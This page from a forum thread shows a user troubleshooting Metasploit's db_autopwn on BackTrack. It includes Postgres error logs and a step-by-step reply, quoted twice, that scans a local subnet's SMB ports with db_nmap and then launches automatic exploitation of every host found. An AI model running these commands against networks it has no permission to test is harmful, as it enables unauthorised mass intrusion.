Page 1 of 2 12 LastLast

Thread: need help with db_autopwn

Default need help with db_autopwn

When I am running the scripts before autopwn, after I run db_hosts, I get this

msf exploit(ms06_040_netapi) > db_hosts
    [-] Error while running command db_hosts: could not connect to server: No such file or directory
    Is the server running locally and accepting
    connections on Unix domain socket "/tmp/.s.PGSQL.5432"?

Call stack:
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/postgresql_adapter.rb:24:in `connect'
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/postgresql_adapter.rb:24:in `postgresql_connection'
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/abstract/connection_specification.rb:262:in `connection_without_query_cache='
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/query_cache.rb:54:in `connection='
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/abstract/connection_specification.rb:230:in `retrieve_connection'
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/abstract/connection_specification.rb:78:in `connection'
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/base.rb:1140:in `add_limit!'
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/base.rb:1102:in `construct_finder_sql'
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/base.rb:997:in `find_every'
    /usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/base.rb:418:in `find'
    /pentest/exploits/framework3/lib/msf/core/db_objects.rb:35:in `find'
    /usr/lib/ruby/1.8/thread.rb:135:in `synchronize'
    /pentest/exploits/framework3/lib/msf/core/db_objects.rb:34:in `find'
    /pentest/exploits/framework3/lib/msf/core/db.rb:160:in `hosts'
    /pentest/exploits/framework3/lib/msf/core/db.rb:151:in `each_host'
    /pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/db.rb:45:in `cmd_db_hosts'
    /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:230:in `run_command'
    /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    /pentest/exploits/framework3/lib/rex/ui/text/shell.rb:125:in `run'
    /pentest/exploits/framework3/msfconsole:77
    msf exploit(ms06_040_netapi) >

and I think it might have something to do with the db_create because after I run that, I get this

msf exploit(ms06_040_netapi) > db_create tester
    createdb: could not connect to database postgres: could not connect to server: No such file or directory
    connections on Unix domain socket "/tmp/.s.PGSQL.5432"?
    psql: could not connect to server: No such file or directory
    connections on Unix domain socket "/tmp/.s.PGSQL.5432"?[*] Database creation complete (check for errors)
    However it still says it created the database

I followed a video seen here

http://milw0rm.com/video/watch.php?id=50

and I do exactly what's shown in the video.

Does someone know what I'm doing wrong? I've tried following tutorials but I get the same results and I have no idea what keywords I'd use to search for.

Any help is appreciated and if there is a keyword I can search for let me know!

Also if i ignore those results and keep going, every command I type results in the first quoted outcome I posted above.

Just burned his ISO

I think its a great thing that some of these tutorial videos dont show the correct and/or complete process because it stops people like you simply following the steps for mass pwnage without understand what the hell is going on.

Please read hdm's blog entry on autopwn:
    blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html

And if you still have problems after that, post back here and I will be more than happy to help

I've done everything in that tutorial and I still get the same results. One thing I did notice was when typing initdb ~/metasploitdb I get this

initdb ~/metasploitdb
    initdb: cannot be run as root
    Please log in (using, e.g., "su") as the (unprivileged) user that will
    own the server process.

Everything before that point in the tutorial I did correctly and did the checks to make sure everythign was alright. I also updated everything so it's all up to date.

Just burned his ISO

ok, ur getting warmer.

you need to su - postgres before you initdb ~/metasploit3

That video you have is shit, it doesnt cover setting up postgres before you autopwn

Theres a much better video made my muts

Steps to autopwnage in bt2:
    Step1:
    #su - postgres
    (Ignore the error message)

Step 2:
    #initdb ~/metasploit3

Step 3:
    #pg_ctl ~/metasploit3 start

Step 4:
    #cd /pentest/exploits/framework3
    #./msfconsole

Step 5:
    msf > load db_postgres
    msf > db_create
    msf > db_hosts
    (No output? Good)

Step 6: Nmap Scan from msf
    msf > db_nmap -p 137,139,445 192.168.0.0/24

Step 7: Check the hosts table now, you should have the positive nmap results
    msf > db_hosts

Step 8: Run autopwn against the ports from your nmap results
    msf > db_autopwn -p -t -e
    (Pwnage in action)
    msf > sessions -l

Voila

Muts did a great video on autopwn in action a while back. I dont know where it is though....

Developer

Maybe you should learn WTF your doing with metasploit before you go off on a half cocked automated exploit binge

Quote Originally Posted by SaintN View Post
    ok, ur getting warmer.

you need to su - postgres before you initdb ~/metasploit3

That video you have is shit, it doesnt cover setting up postgres before you autopwn

Theres a much better video made my muts

Steps to autopwnage in bt2:
    Step1:
    #su - postgres
    (Ignore the error message)

Step 2:
    #initdb ~/metasploit3

Step 3:
    #pg_ctl ~/metasploit3 start

Step 4:
    #cd /pentest/exploits/framework3
    #./msfconsole

Step 5:
    msf > load db_postgres
    msf > db_create
    msf > db_hosts
    (No output? Good)

Step 6: Nmap Scan from msf
    msf > db_nmap -p 137,139,445 192.168.0.0/24

Step 7: Check the hosts table now, you should have the positive nmap results
    msf > db_hosts

Step 8: Run autopwn against the ports from your nmap results
    msf > db_autopwn -p -t -e
    (Pwnage in action)
    msf > sessions -l

Voila

Muts did a great video on autopwn in action a while back. I dont know where it is though....
    Thanks a bunch! I wouldn't have known what to do with su since I haven't used that feature before in linux (never had to before backtrack)

i got it working (sorta). it's been running for a while, and it's been stuck on this for about 5 minutes

[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.101[\lsarpc] ...

and the white cursor is just sitting below that so is it actually still doing stuff, or did it just die? I thought the numbers and letters were weird, being in order and whatnot

Just burned his ISO

Quote Originally Posted by unlazyfree View Post
    I wouldn't have known what to do with su since I haven't used that feature before in linux (never had to before backtrack)
    ok, thats made my day.
    No more help for you

Quote Originally Posted by SaintN View Post
    ok, thats made my day.
    No more help for you
    I meant I thought you just had to enter su, and that's what i've been doing before you helped me out.

But any reason why it would freeze after it bound to the computer? it doesnt do it all the time though

Page 1 of 2 12 LastLast